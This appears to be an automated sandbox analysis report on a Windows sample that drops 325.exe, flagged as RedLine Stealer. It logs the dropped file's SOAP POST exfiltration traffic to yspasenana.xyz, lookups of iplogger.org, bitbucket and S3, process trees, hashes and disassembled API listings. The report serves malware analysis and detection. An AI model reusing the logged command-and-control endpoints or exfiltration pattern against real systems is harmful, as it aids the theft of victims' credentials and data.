Jul 22, 2021 11:44:11.850276947 CEST	6979	OUT	Data Raw: 4d 4b 71 48 72 4b 2b 55 4e 53 53 49 53 4e 52 77 4f 31 45 64 4b 54 31 4a 4e 73 72 44 64 65 52 7a 35 6e 49 6b 4c 41 41 64 34 6e 72 59 76 78 63 32 73 59 4d 63 44 65 51 6b 41 57 31 65 45 6f 48 42 2b 66 41 35 4f 35 45 6b 32 6f 48 32 6b 62 52 6a 4f 44 Data Ascii: MKqHrK+UNSSISNRwO1EdKT1JNsrDdeRz5nIkLAAd4nrYvxc2sYMcDeQkAW1eEoHB+fA5O5Ek2oH2kbRjOD09/ee+P9C2AbWFK2OLNCR13FNa9nyoLUAb+YW6vkbu3MQ58zZKQ2mpD7IElGnadK5PkfzbjP6Xy3Zk1TYeuY3KzfUVOg7nA8f09ZX75HbexveGhvbbst11axeg8J5jAWjh+yc6BvPgh9p7a5sG+tuyuMFjzOKGT3C
Jul 22, 2021 11:44:11.850358963 CEST	6989	OUT	Data Raw: 49 52 65 39 6b 77 49 64 4e 34 58 4f 4a 39 2f 7a 4e 70 6c 57 76 75 2b 44 4b 43 4d 53 43 53 58 6c 64 36 52 42 38 6f 39 41 73 6f 53 59 43 38 42 77 50 78 4a 55 30 79 52 71 66 38 30 4d 43 55 41 70 2f 6c 49 43 4d 45 64 77 33 6b 6a 32 49 55 41 66 6c 69 Data Ascii: IRe9kwIdN4XOJ9/zNplWvu+DKCMSCSXld6RB8o9AsoSYC8BwPxJU0yRqf80MCUAp/lICMEdw3kj2IUAfliDpJ3H3Cd1zErENCUB5j6JtnprxgdJK2u0ch/r5VlIwFqO5sAY4p9UA5vaJI9cnan1VC1pz18Dr+b4gCScZ91eCZb4SUBkTBUm5aYLqNARQ9iFUfwB9LIfOPy34+Iub7gCRdcwxeQGIpEwOVIZEpUd1cqBzaalpLH2
Jul 22, 2021 11:44:11.850747108 CEST	6997	OUT	Data Raw: 6e 67 4c 77 43 57 5a 68 76 55 63 35 4b 63 65 43 6a 74 42 43 73 41 54 4f 49 32 55 66 67 59 51 66 65 74 4a 50 53 7a 39 2b 32 6f 2f 46 33 2b 71 57 33 39 7a 7a 6e 6d 5a 68 33 63 65 59 68 51 32 65 36 44 75 66 62 77 52 78 51 30 2b 62 4f 33 39 2f 74 4c Data Ascii: ngLwCWZhvUc5KceCjtBCsATOI2UfgYQfetJPSz9+2o/F3+qW39zznmZh3ceYhQ2e6DufbwRxQ0+bO39/tLn2J7uZa3/8Kvu6q7nujNeY63+6m7nhZ681N/78dZbXmz/88o3mpl+9ydx85pvNLWe/1dzy67eZ2855u7ntN+80t69+l7n93P80d5z3HnPHb99r7jr//eauC//Lsru5+6I9zDVn/5frAGuSALzjjjsctzO3j7jt9ts
Jul 22, 2021 11:44:11.851100922 CEST	7008	OUT	Data Raw: 56 53 7a 38 6e 36 77 6c 6f 44 6b 32 68 35 37 66 55 2f 47 7a 6a 4a 4d 79 6f 50 57 58 5a 72 52 6d 43 33 48 37 36 54 58 44 6f 6b 32 44 47 4b 55 4a 31 36 4f 31 6f 48 58 51 49 49 44 31 4f 38 4c 56 51 57 39 48 48 6f 59 51 61 51 61 72 76 32 33 44 67 47 Data Ascii: VSz8n6wloDk2h57fU/GzjJMyoPWXZrRmC3H76TXDok2DGKUJ16O1oHXQIID1O8LVQW9HHoYQaQarv23DgGCfPZZ877D1EHA9loq4fpVAwddFKwD5ybwS6Ok9iXySj7jppz81v/3nfzY3/+pX5uazzoKiLyf7kPD7ruU7Ld+2zK4AlLRP/11+rIW+B/Bkc90ZrzY3tE8BkgBsfgyEfg2YBeBbze3yY8C/bT4GvKYJwKOSAlCJP+L
Jul 22, 2021 11:44:12.285859108 CEST	8049	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:44:12 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49742	212.224.105.105	80	C:\Users\user\AppData\Roaming\325.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 11:44:12.465971947 CEST	8050	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: yspasenana.xyz Content-Length: 1125483 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 22, 2021 11:44:12.515531063 CEST	8050	IN	HTTP/1.1 100 Continue
Jul 22, 2021 11:44:12.516504049 CEST	8063	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>CH</a:Count
Jul 22, 2021 11:44:12.564598083 CEST	8073	OUT	Data Raw: 65 54 75 48 6a 71 6c 79 64 41 6c 41 78 73 63 54 4d 6a 62 4c 78 47 64 49 74 6b 6c 51 62 49 50 53 49 56 4a 35 35 48 61 45 54 4f 76 7a 69 50 6a 52 45 77 69 2b 4c 6b 4b 68 35 4a 38 38 61 39 45 66 75 57 57 67 6a 43 75 45 66 30 44 45 73 66 56 7a 41 6c Data Ascii: eTuHjqlydAlAxscTMjbLxGdItklQbIPSIVJ55HaETOvziPjREwi+LkKh5J88a9EfuWWgjCuEf0DEsfVzAlZs9VdVBHXSMtDRnkeLPl8Np8ulT+6n9woSgDkJyPtToDwOf1x1HXV87rfrfkJrDwvo/1mAAIyQ91sHWgCmoXEhDx5/uojHny5kvdD+GvT8Pi5wjgGgvERpOga36RqM/g871V5JUOwwA6CYqAYUcwWo+CzIJ/el0MJ
Jul 22, 2021 11:44:12.564752102 CEST	8087	OUT	Data Raw: 6b 51 75 6a 43 46 53 6d 51 4c 63 33 67 39 49 53 4b 47 30 58 71 42 77 45 79 6a 73 75 55 76 4c 6c 30 47 33 4b 32 2b 4d 46 63 7a 64 79 2f 74 66 78 77 64 42 49 34 59 65 51 73 56 79 53 75 51 44 73 6a 5a 52 6c 61 4c 39 47 70 74 66 41 39 4e 73 38 72 78 Data Ascii: kQujCFSmQLc3g9ISKG0XqBwEyjsuUvLl0G3K2+MFczdy/tfxwdBI4YeQsVySuQDsjZRlaL9GptfA9Ns8rx/bPt8RlAWOJbdBUNv1wF8nfT1ZAAoRSOKPgX2CUP0q6pvc/8E9MyjoY8MSMD6MBYjRc8gxDqLmezSGjoUaV7uAcxgA5YWgOo0Bmrc0KB/TlUaWMwQ6ntGgGGhQwNplFvDrC7FeWRLQOnA5oOsvz8kyifblMmtA136
Jul 22, 2021 11:44:12.605175972 CEST	8089	OUT	Data Raw: 66 38 55 75 76 6c 35 4e 38 39 6c 4a 36 2f 38 49 4f 55 58 31 33 58 36 56 2f 65 73 6b 73 38 73 36 39 32 6a 4b 73 76 6b 58 36 4f 4f 62 68 43 31 76 67 63 51 65 53 5a 7a 56 42 35 6a 74 2f 2b 69 70 6a 61 42 36 70 62 30 47 66 32 54 54 37 37 43 66 7a 58 Data Ascii: f8Uuvl5N89lJ6/8IOUX13X6V/esks8s692jKsvkX6OObhC1vgcQeSZzVB5jt/+ipjaB6pb0Gf2TT77CfzXuy2YX+JjHnRGQrACmfPI6TuMQzmzJ2obYa1c+VR1KRcPmoTrb9qA3X+fc2HXhPx6H2A+3kJ2J9jehYJPAIWUfeTk8Z/gVJN3Fu1OeIe1D9bXqSp3Q+T9k/bhvqA/rc0PF0X9HtSWJNHtPl4XLp3O0+e268mOx6de0
Jul 22, 2021 11:44:12.612040997 CEST	8092	OUT	Data Raw: 38 46 74 36 6e 4e 64 73 54 39 39 39 53 4e 4b 4f 68 44 37 39 49 49 67 58 79 37 5a 73 45 6e 78 55 44 33 6f 36 56 33 30 45 4f 4e 6e 6e 62 62 71 46 2b 32 35 71 2b 46 65 73 6d 31 2b 79 74 6e 32 49 6f 66 75 49 66 69 57 59 76 69 63 43 42 41 51 6a 55 46 Data Ascii: 8Ft6nNdsT999SNKOhD79IIgXy7ZsEnxUD3o6V30EONnnbbqF+25q+Fesm1+ytn2IofuIfiWYvicCBAQjUFCSRgdAcwGYR0qqPqAyJVF7qPbUROlBmQSqC0QLCSA1soBjl6DrgdKE2L4G0O2RA7Vn1L9TwDotX3y7o2sq0P1DAxerFSCpVwMqMwAsmgPoHHvg5yz6W4DaKEck/9Y2AegFWQIl1JD0k+j0k2e6AlDuS+3PIgUgAaW
Jul 22, 2021 11:44:12.612334967 CEST	8095	OUT	Data Raw: 72 4b 2b 55 4e 53 53 49 53 4e 52 77 4f 31 45 64 4b 54 31 4a 4e 73 72 44 64 65 52 7a 35 6e 49 6b 4c 41 41 64 34 6e 72 59 76 78 63 32 73 59 4d 63 44 65 51 6b 41 57 31 65 45 6f 48 42 2b 66 41 35 4f 35 45 6b 32 6f 48 32 6b 62 52 6a 4f 44 30 39 2f 65 Data Ascii: rK+UNSSISNRwO1EdKT1JNsrDdeRz5nIkLAAd4nrYvxc2sYMcDeQkAW1eEoHB+fA5O5Ek2oH2kbRjOD09/ee+P9C2AbWFK2OLNCR13FNa9nyoLUAb+YW6vkbu3MQ58zZKQ2mpD7IElGnadK5PkfzbjP6Xy3Zk1TYeuY3KzfUVOg7nA8f09ZX75HbexveGhvbbst11axeg8J5jAWjh+yc6BvPgh9p7a5sG+tuyuMFjzOKGT3CvvM2
Jul 22, 2021 11:44:12.612390995 CEST	8100	OUT	Data Raw: 78 67 69 64 64 6d 30 52 67 43 67 4e 4f 6a 2b 4e 4c 71 63 4c 56 45 59 4f 31 43 59 31 6f 44 49 6c 71 49 34 42 37 66 31 52 43 6e 38 6e 49 46 4f 36 55 49 6c 6f 42 65 44 43 53 6c 72 45 53 4d 4c 6a 52 66 65 73 50 6a 2f 51 4a 6c 33 77 78 35 49 49 58 64 Data Ascii: xgiddm0RgCgNOj+NLqcLVEYO1CY1oDIlqI4B7f1RCn8nIFO6UIloBeDCSlrESMLjRfesPj/QJl3wx5IIXd6aAl9ftC9At69CXw8Nllo1gL6B+hSB0sIylxPonCpBbTUXgMPQWa+1VwAubvscj95XjBCACNh3BTVpJ4EUgBMXgejeh2NKBWDMJ/z4DvZJ0PxaA4oZIbz2UWsgKf0kfo2r4t0cqRh5SGQs3vDkIqToQEC5UQKSUnO
Jul 22, 2021 11:44:12.612554073 CEST	8111	OUT	Data Raw: 6b 77 49 64 4e 34 58 4f 4a 39 2f 7a 4e 70 6c 57 76 75 2b 44 4b 43 4d 53 43 53 58 6c 64 36 52 42 38 6f 39 41 73 6f 53 59 43 38 42 77 50 78 4a 55 30 79 52 71 66 38 30 4d 43 55 41 70 2f 6c 49 43 4d 45 64 77 33 6b 6a 32 49 55 41 66 6c 69 44 70 4a 33 Data Ascii: kwIdN4XOJ9/zNplWvu+DKCMSCSXld6RB8o9AsoSYC8BwPxJU0yRqf80MCUAp/lICMEdw3kj2IUAfliDpJ3H3Cd1zErENCUB5j6JtnprxgdJK2u0ch/r5VlIwFqO5sAY4p9UA5vaJI9cnan1VC1pz18Dr+b4gCScZ91eCZb4SUBkTBUm5aYLqNARQ9iFUfwB9LIfOPy34+Iub7gCRdcwxeQGIpEwOVIZEpUd1cqBzaalpLH28kjq
Jul 22, 2021 11:44:12.612983942 CEST	8134	OUT	Data Raw: 43 57 5a 68 76 55 63 35 4b 63 65 43 6a 74 42 43 73 41 54 4f 49 32 55 66 67 59 51 66 65 74 4a 50 53 7a 39 2b 32 6f 2f 46 33 2b 71 57 33 39 7a 7a 6e 6d 5a 68 33 63 65 59 68 51 32 65 36 44 75 66 62 77 52 78 51 30 2b 62 4f 33 39 2f 74 4c 6e 32 4a 37 Data Ascii: CWZhvUc5KceCjtBCsATOI2UfgYQfetJPSz9+2o/F3+qW39zznmZh3ceYhQ2e6DufbwRxQ0+bO39/tLn2J7uZa3/8Kvu6q7nujNeY63+6m7nhZ681N/78dZbXmz/88o3mpl+9ydx85pvNLWe/1dzy67eZ2855u7ntN+80t69+l7n93P80d5z3HnPHb99r7jr//eauC//Lsru5+6I9zDVn/5frAGuSALzjjjsctzO3j7jt9tsF9v1
Jul 22, 2021 11:44:12.652571917 CEST	8137	OUT	Data Raw: 69 39 73 6d 52 36 41 46 34 45 70 49 51 46 75 6e 50 63 37 63 62 55 70 34 32 31 4c 67 62 63 37 67 76 4f 49 66 31 30 49 36 58 30 55 52 57 4d 72 41 63 49 35 65 32 72 39 6c 63 6a 38 61 62 6c 69 36 72 77 66 46 44 65 70 61 34 57 4d 45 49 46 69 67 41 50 Data Ascii: i9smR6AF4EpIQFunPc7cbUp421Lgbc7gvOIf10I6X0URWMrAcI5e2r9lcj8abli6rwfFDepa4WMEIFigAPSuv4OROxpmIcWrfrwxGC8W1/QKQKGsGzFO+5tygBUQgHb4WCbI/Rh878LZNoxTNq6riynrLdM4jNBz5B+w5QS7PKOZ7HxcIbsSlXG4LUUCVPCZq77RnPaMP2yOe/J7MhCg3nzzzc0HPvCBQuwJfYJPJN8Y0Se8inh
Jul 22, 2021 11:44:13.002619982 CEST	9171	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:44:12 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 22, 2021 11:42:58.915039062 CEST	88.99.66.31	443	192.168.2.3	49711	CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029
Jul 22, 2021 11:42:59.480372906 CEST	104.25.234.53	443	192.168.2.3	49712	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jun 11 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jun 11 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jul 22, 2021 11:42:59.480372906 CEST	104.25.234.53	443	192.168.2.3	49712	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19
Jul 22, 2021 11:43:00.024015903 CEST	104.192.141.1	443	192.168.2.3	49713	CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 27 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Mon May 23 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jul 22, 2021 11:43:00.024015903 CEST	104.192.141.1	443	192.168.2.3	49713	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		37f463bf4616ecd445d4a1937da06e19
Jul 22, 2021 11:43:00.820909977 CEST	52.217.201.169	443	192.168.2.3	49715	CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 11 01:00:00 CET 2021 Tue Dec 08 13:05:07 CET 2015	Sat Feb 12 00:59:59 CET 2022 Sat May 10 14:00:00 CEST 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jul 22, 2021 11:43:00.820909977 CEST	52.217.201.169	443	192.168.2.3	49715	CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Dec 08 13:05:07 CET 2015	Sat May 10 14:00:00 CEST 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: kS2dqbsDwD.exe PID: 5492 Parent PID: 5684

General

Start time:	11:42:57
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\kS2dqbsDwD.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\kS2dqbsDwD.exe'
Imagebase:	0x140000000
File size:	598944 bytes
MD5 hash:	888AB99280A081717EC5C5749266D1BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 325.exe PID: 4796 Parent PID: 5492

General

Start time:	11:43:03
Start date:	22/07/2021
Path:	C:\Users\user\AppData\Roaming\325.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\325.exe 325
Imagebase:	0x3b0000
File size:	979968 bytes
MD5 hash:	523AC177BFB4FB64A20B60FC0CE3E0E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 33%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: 325.exe PID: 1784 Parent PID: 4796

General

Start time:	11:43:44
Start date:	22/07/2021
Path:	C:\Users\user\AppData\Roaming\325.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x6b0000
File size:	979968 bytes
MD5 hash:	523AC177BFB4FB64A20B60FC0CE3E0E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: kS2dqbsDwD.exe PID: 5492 Parent PID: 5684 kS2dqbsDwD.exeCOMMON

Executed Functions

Function 00000001400018BA, Relevance: 110.1, APIs: 58, Strings: 4, Instructions: 1576timewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnWire.KERNEL32 ref: 00000001400018EA
CloseClipboard.USER32 ref: 00000001400018F7
SetTimer.USER32 ref: 00000001400019AA
GetTickCount.KERNEL32 ref: 0000000140001A20
GetTickCount.KERNEL32 ref: 0000000140001A7F
GetMessageW.USER32 ref: 0000000140001AC9
GetTickCount.KERNEL32 ref: 0000000140001AD8

Strings

C:\Users\user\Desktop, xrefs: 00000001400026A0
#32770, xrefs: 0000000140002644
MZ@, xrefs: 00000001400024B5, 00000001400030D9
call, xrefs: 0000000140003405, 0000000140003526, 00000001400035CA

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$ClipboardCloseGlobalMessageTimerWire
String ID: #32770$C:\Users\user\Desktop$MZ@$call
API String ID: 2557253243-2385611772
Opcode ID: 58c19b412f63fddfb88de8116e6fc38fa378b9250b005aac9534c78de9d4bc27
Instruction ID: cd72fd80d9fc3913f8d5bc22bb4b7d38fe5eb4e655b5691a0bbb5f0414b09c5c
Opcode Fuzzy Hash: 58c19b412f63fddfb88de8116e6fc38fa378b9250b005aac9534c78de9d4bc27
Instruction Fuzzy Hash: 05F2BCB27057808AEB66CF2AE5943E937A1F78DBC4F144126EB4A47BB5DB78C941C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043AD0, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 462registryclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A2B14: RtlAcquirePebLock.NTDLL ref: 00000001400A2B24

RegisterClipboardFormatW.USER32 ref: 0000000140043B2B

Part of subcall function 00000001400A2AB4: RtlAcquirePebLock.NTDLL ref: 00000001400A2AC4
Part of subcall function 00000001400A2AB4: RtlLeaveCriticalSection.NTDLL ref: 00000001400A2B04

Strings

MZ@, xrefs: 0000000140043BDB, 000000014004436F
D, xrefs: 0000000140043BA2
TaskbarCreated, xrefs: 0000000140043B24
, xrefs: 0000000140043F40

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcquireLock$ClipboardCriticalFormatLeaveRegisterSection
String ID: $D$MZ@$TaskbarCreated
API String ID: 3204332510-1372881053
Opcode ID: 6233dde848d130efb6c3b4ed110b9a9e38cb8e0674c939a0605f92c27d8814da
Instruction ID: 44d09944b129bc0f4644ff7b7632f5aa6743972d147f967da645f6f3c28f9c93
Opcode Fuzzy Hash: 6233dde848d130efb6c3b4ed110b9a9e38cb8e0674c939a0605f92c27d8814da
Instruction Fuzzy Hash: 6422877520474087EB3ACB53E8947A977A1F78CBC8F464025EB8A43BB5CB78D945CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400184C0, Relevance: 59.7, APIs: 24, Strings: 10, Instructions: 241registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140088BA0: LoadLibraryExW.KERNEL32 ref: 0000000140088BD1
Part of subcall function 0000000140088BA0: FindResourceW.KERNEL32 ref: 0000000140088C3A
Part of subcall function 0000000140088BA0: LoadResource.KERNEL32 ref: 0000000140088C4F
Part of subcall function 0000000140088BA0: LockResource.KERNEL32 ref: 0000000140088C69
Part of subcall function 0000000140088BA0: GetSystemMetrics.USER32 ref: 0000000140088C89
Part of subcall function 0000000140088BA0: FindResourceW.KERNEL32 ref: 0000000140088CF2
Part of subcall function 0000000140088BA0: LoadResource.KERNEL32 ref: 0000000140088D06
Part of subcall function 0000000140088BA0: LockResource.KERNEL32 ref: 0000000140088D14
Part of subcall function 0000000140088BA0: SizeofResource.KERNEL32 ref: 0000000140088D28

GetSystemMetrics.USER32 ref: 000000014001856B

Part of subcall function 0000000140088BA0: EnumResourceNamesW.KERNEL32 ref: 0000000140088C26
Part of subcall function 0000000140088BA0: CreateIconFromResourceEx.USER32 ref: 0000000140088D4B
Part of subcall function 0000000140088BA0: FreeLibrary.KERNEL32 ref: 0000000140088D64

LoadCursorW.USER32 ref: 00000001400185A0
RegisterClassExW.USER32 ref: 00000001400185BC
RegisterClassExW.USER32 ref: 00000001400185DD
GetForegroundWindow.USER32 ref: 0000000140018613
GetClassNameW.USER32 ref: 000000014001862B
CreateWindowExW.USER32 ref: 00000001400186AA
GetMenu.USER32 ref: 00000001400186C3
EnableMenuItem.USER32 ref: 00000001400186DA
CreateWindowExW.USER32 ref: 0000000140018736
GetDC.USER32 ref: 0000000140018792
GetDeviceCaps.GDI32 ref: 00000001400187AC
MulDiv.KERNEL32 ref: 00000001400187BD
GetDeviceCaps.GDI32 ref: 00000001400187CC
MulDiv.KERNEL32 ref: 00000001400187DD
CreateFontW.GDI32 ref: 000000014001881F
ReleaseDC.USER32 ref: 0000000140018836
